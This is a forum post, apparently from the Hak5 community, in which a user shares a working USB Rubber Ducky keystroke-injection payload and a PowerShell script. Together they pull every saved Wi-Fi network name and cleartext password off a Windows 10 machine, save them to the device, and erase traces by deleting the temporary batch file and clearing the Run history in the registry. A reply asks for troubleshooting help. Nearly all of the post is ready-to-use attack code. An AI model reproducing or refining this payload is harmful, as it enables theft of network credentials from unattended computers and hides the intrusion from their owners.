Jump to content
Hak5 Forums
audie2180

Get Wifi passwords from Windows 10 - Twin Ducky 2.1

Recommended Posts

My first script using the Ducky... 

Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise:

* It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY

* It then uses  Select-String cmdlet to get the password for the wireless networks on the target machine

* Saves this (albeit slightly messily) to Output.txt on the Ducky 

* Finally gets rid of the TEMP file and history in the run command window

Look forward to comments and anything anyone can suggest to speed this up and make it better. 

Cheers 

Audie

 

Ducky Script

REM Author: Audie2180
REM Ducky WIFI credential plain text password report: 1.0
REM Target: Windows 10
REM Firmware: Twin Duck 2.1
REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks
DELAY 1000

REM ----Open cmd as administrator

GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM ----Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM ----Make batch file that waits for SD card to mount. 
REM ----Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM ----Continue script
STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt
ENTER
CONTROL z
ENTER
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500

REM ---- Run BAT file 
DELAY 1000
GUI r
DELAY 500
STRING %TEMP%/DuckyWait.bat
DELAY 500
ENTER
DELAY 800

REM ----Open cmd as administrator

GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM --- Clean up, close CMD, delete tmp files, remove command prompt hist
REM --- Cleanup file created
DELAY 500
STRING del /f %TEMP%\DuckyWait.bat
ENTER

REM ----Clear the Run history and exit
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit

REM --- Close CMD
DELAY 500
ALT F4
DELAY 500

REM ---- Flash CAPSLOCK
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK

... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file...

a.ps1 

#Make a list with all WiFi SSID's and passwords stored locally on Windows OS.

$output = netsh.exe wlan show profiles
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList

#for each profile name get the SSID and password
for($i = 0; $i -lt $profileRows.Count; $i++){
    $profileName = ($profileRows[$i] -split ":")[-1].Trim()
    
    $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
    
    $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
    $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'

    $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
    if($passwordSearchResult){
        $profilePw = ($passwordSearchResult -split ":")[-1].Trim()
    } else {
        $profilePw = ''
    }
    
    $networkObject = New-Object -TypeName psobject -Property @{
        ProfileName = $profileName
        SSID = $profileSSID
        Password = $profilePw
    }
    $profileNames.Add($networkObject)
}

$profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password

 

  • Upvote 1

Share this post


Link to post
Share on other sites

Audie2180, did you just copy the .ps1 to the ducky and then call it with the inject.bin compile? I don't see the file ever execute in the %TEMP% directory. I know there is a cleanup but I am not getting an output.txt on the ducky. Thank you, great info.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×